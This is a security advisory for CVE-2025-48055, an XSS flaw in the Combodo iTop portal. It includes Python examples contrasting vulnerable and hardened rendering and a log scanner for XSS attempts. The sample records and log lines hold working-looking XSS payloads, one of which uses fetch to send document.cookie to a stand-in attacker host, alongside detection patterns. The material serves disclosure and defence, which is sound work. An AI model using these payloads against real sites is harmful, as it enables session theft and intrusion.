
CVE-2025-48055: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Combodo iTop

Severity: High
Tags: Vulnerability, CVE-2025-48055, CWE-79
Published: Mon Nov 10 2025 (11/10/2025, 20:33:48 UTC)
Source: CVE Database V5
Vendor/Project: Combodo
Product: iTop

Description

Combodo iTop is a web based IT service management tool. In versions prior to 3.2.2, when displaying content in a browse brick in the user portal, a cross-site scripting attack can occur. This is fixed in versions 3.2.2 and 3.3.0.

AI-Powered Analysis

Last updated: 11/10/2025, 20:37:11 UTC

Technical Analysis

CVE-2025-48055 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, in Combodo iTop, a web-based IT service management platform. It affects versions prior to 3.2.2 and arises when the application fails to neutralize user-supplied input during page generation, specifically when a browse brick in the user portal displays content. An attacker holding a low-privileged portal account can place JavaScript in data the brick renders, and that script then executes in the browser of any other user who views the affected page. The advisory does not state whether the payload is stored or reflected.

The CVSS v3.1 vector is AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N, giving a base score of 8.5 (High). The flaw is reachable over the network (AV:N) with low attack complexity (AC:L); the attacker needs some privileges (PR:L) but no elevated rights, and the vector is scored without user interaction (UI:N). Scope is changed (S:C) because the injected script runs in the victim's browser, a different security authority than the vulnerable server-side component. Confidentiality impact is high (C:H): the script can read anything the victim's session can reach through the portal, including session tokens and other sensitive data (an HttpOnly session cookie cannot be read directly, but the script can still issue requests on the victim's behalf). Integrity impact is low (I:L) and availability is unaffected (A:N).

The issue was publicly disclosed on November 10, 2025, and is fixed in iTop 3.2.2 and 3.3.0. No exploitation in the wild had been reported at the time of writing. Because ITSM tools hold sensitive organizational data and are used to manage IT assets and incidents, exploitation could facilitate further attacks or data breaches.
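The CWE-79 pattern described above, as an added example that is not Combodo's code and does not reproduce iTop's templates: a browse-style list rendered once without output encoding and once with context-aware encoding, followed by a small HTML-parser check that reports whether the output carries a live script element or an event-handler attribute. The records, the /portal/object/... path and the evil.example host are constructed for the demonstration; one payload targets the element body, the other breaks out of a quoted attribute.

```python
"""Vulnerable vs. hardened rendering of a portal 'browse' list (CWE-79).

Added example for this page; it is not Combodo's code and does not reproduce
iTop's templates. It models the pattern the advisory describes: text that a
low-privileged portal user controls (here a ticket title) is written into the
page, once without output encoding and once with context-aware encoding.
"""
import html
from html.parser import HTMLParser

# Constructed sample records. Item 102 carries a payload aimed at the element
# body, item 103 one aimed at breaking out of a quoted attribute.
ITEMS = [
    {"id": 101, "title": "Printer on 3rd floor jammed", "status": "open"},
    {"id": 102, "title": "Réseau lent <script>fetch('//evil.example/?c='+document.cookie)</script>", "status": "open"},
    {"id": 103, "title": 'x" autofocus onfocus="alert(document.domain)', "status": "closed"},
]

# Hypothetical row template; /portal/object/ is not iTop's real URL layout.
ROW = '<li class="{status}"><a href="/portal/object/{id}" title="{title}">{title}</a></li>'


def render_browse_brick_vulnerable(items):
    """Unsafe: raw values are interpolated into both HTML text and attribute contexts."""
    return "<ul>\n" + "\n".join(ROW.format(**it) for it in items) + "\n</ul>"


def render_browse_brick_hardened(items):
    """Safe: each untrusted value is encoded (or validated) for the context it lands in."""
    rows = []
    for it in items:
        rows.append(ROW.format(
            # int() validates the value that becomes part of a URL path
            id=int(it["id"]),
            # quote=True also encodes " and ', so the value cannot close a quoted attribute
            title=html.escape(it["title"], quote=True),
            status=html.escape(str(it["status"]), quote=True),
        ))
    return "<ul>\n" + "\n".join(rows) + "\n</ul>"


class ScriptDetector(HTMLParser):
    """Tokenizes markup the way a browser would and records anything that would execute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script> element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag} {name}= handler")


def live_script_in(markup):
    """Return the executable constructs found in markup; an empty list means the payloads are inert."""
    detector = ScriptDetector()
    detector.feed(markup)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    for label, render in (("vulnerable", render_browse_brick_vulnerable), ("hardened", render_browse_brick_hardened)):
        out = render(ITEMS)
        print(f"--- {label} ---\n{out}\nexecutable: {live_script_in(out) or 'none'}\n")
```

Note that in the vulnerable output the `<script>` copy inside the title attribute is inert while the copy in the link text executes, and the reverse holds for item 103: the quote in the title breaks out of the attribute and adds an onfocus handler, while the same text between the anchor tags is harmless. Encoding has to match the context, which is why the hardened version encodes quotes as well as angle brackets and validates the numeric id rather than encoding it.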

Potential Impact

For European organizations, this vulnerability poses a significant risk to the confidentiality of sensitive IT service management data, including user credentials, configuration details, and incident records. Because iTop is used to manage IT assets and services, successful exploitation could let an attacker gather intelligence for lateral movement or privilege escalation within the network. The vector's AV:N and UI:N scoring means a low-privileged portal account is the only attacker-side precondition, which matters most for organizations that expose the user portal to the internet. Confidentiality breaches could lead to regulatory non-compliance under GDPR, with legal and financial repercussions. A compromised ITSM platform may also disrupt incident response and service management processes, indirectly affecting operational integrity. Organizations in sectors with critical infrastructure or high-value targets, such as finance, healthcare, and government, are particularly exposed. The absence of known exploits in the wild currently reduces immediate risk but does not eliminate it, so timely patching is essential.

Mitigation Recommendations

1. Upgrade all Combodo iTop instances to the fixed release for their branch: 3.2.2 on the 3.2 branch, or 3.3.0. This is the only complete fix.
2. Treat every value shown in the user portal, especially in browse bricks, as untrusted: validate input on entry and encode output for the HTML context it lands in. For a deployer this applies to custom bricks, extensions and portal customizations, which the vendor patch does not cover.
3. Restrict access to the user portal to trusted networks or a VPN to limit exposure to external attackers.
4. Put a web application firewall (WAF) with XSS rules in front of iTop, treating it as a stopgap that reduces, but does not remove, the risk until the upgrade is done.
5. Conduct regular security audits and penetration tests that cover web application vulnerabilities in ITSM tools.
6. Tell users and administrators about the risk and ask them to report unexpected portal behaviour promptly.
7. Monitor web-server and application logs for signs of attempted exploitation, such as script tags, event-handler attributes or javascript: URLs in request parameters, including their percent-encoded forms.
8. Send a Content-Security-Policy header for the portal that restricts script sources (a nonce- or hash-based script-src without 'unsafe-inline') so that an injected inline script is blocked even if it reaches the page; test the policy against the application's own scripts before enforcing it.
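Items 7 and 8 above, as an added example that is not Combodo code and does not know iTop's real URL layout: a scanner that percent-decodes the path and query parameters of access-log lines (single or double encoded) and flags script-injection indicators, plus a check that a Content-Security-Policy header actually restricts inline script. The log lines, the /portal/... paths, the client addresses and the evil.example host are constructed for the demonstration.

```python
"""Detection checks for XSS attempts against a web portal (mitigations 7 and 8).

Added example for this page; it is not Combodo code and does not know iTop's
real URL layout. The log lines, /portal/... paths, client addresses and the
evil.example host are constructed for the demonstration.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Script-injection indicators, matched against *decoded* values so percent-encoding
# (single or double) cannot hide them. Expect false positives (a parameter literally
# named "one=" trips the handler rule); treat hits as leads, not confirmed exploitation.
INDICATORS = [
    ("script tag", re.compile(r"<\s*/?\s*script", re.I)),
    ("event handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript: URL", re.compile(r"javascript\s*:", re.I)),
    ("active element", re.compile(r"<\s*(img|svg|iframe|object|embed|math)\b", re.I)),
]


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so %253C ends up as <."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def indicators_in(value):
    return [name for name, rx in INDICATORS if rx.search(value)]


def scan_line(line):
    """Return one finding per suspicious path or query value in a single log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    # parse_qsl decodes one layer itself; fully_decode strips any further layers
    candidates = [("<path>", parts.path)] + parse_qsl(parts.query, keep_blank_values=True)
    findings = []
    for name, raw in candidates:
        decoded = fully_decode(raw)
        hits = indicators_in(decoded)
        if hits:
            findings.append({
                "ip": m.group("ip"), "user": m.group("user"), "time": m.group("time"),
                "path": parts.path, "param": name, "decoded": decoded, "indicators": hits,
            })
    return findings


def scan_access_log(lines):
    findings = []
    for line in lines:
        findings.extend(scan_line(line))
    return findings


def csp_restricts_inline_script(header_value):
    """True if the policy has a script source list that does not permit inline script.

    CSP Level 2+ browsers ignore 'unsafe-inline' when a nonce or hash source is
    present, so such a policy still counts as restricting inline script.
    """
    directives = {}
    for part in header_value.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return False
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources)
    return "'unsafe-inline'" not in sources or has_nonce_or_hash


# Constructed sample log (not real traffic). The third line is double-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2025:20:40:01 +0000] "GET /portal/browse/items?search=laptop HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - alice [10/Nov/2025:20:40:09 +0000] "GET /portal/browse/items?search=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
203.0.113.7 - alice [10/Nov/2025:20:41:15 +0000] "GET /portal/browse/items?filter=%253Cimg%2520src%253Dx%2520onerror%253Dfetch(%2527//evil.example/%2527%252Bdocument.cookie)%253E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Nov/2025:20:42:30 +0000] "POST /portal/login HTTP/1.1" 302 0 "-" "curl/8.0"
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['ip']} user={f['user']} {f['path']} {f['param']}={f['decoded']!r} -> {', '.join(f['indicators'])}")
    print("CSP restricts inline script:", csp_restricts_inline_script("default-src 'self'; script-src 'self' 'unsafe-inline'"))
```

The scanner only sees query strings in GET requests; a payload submitted in a POST body or stored earlier through the API will not appear in the access log, so pair this with application-level logging of the fields the brick renders. The CSP check is deliberately strict about 'unsafe-inline' because that single keyword is what lets an injected inline script run.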


Technical Details

Data Version: 5.2
Assigner Short Name: GitHub_M
Date Reserved: 2025-05-15T16:06:40.940Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 69124ce358b9e66d50f34b7d

Added to database: 11/10/2025, 8:36:51 PM

Last enriched: 11/10/2025, 8:37:11 PM

Last updated: 11/12/2025, 4:07:59 AM
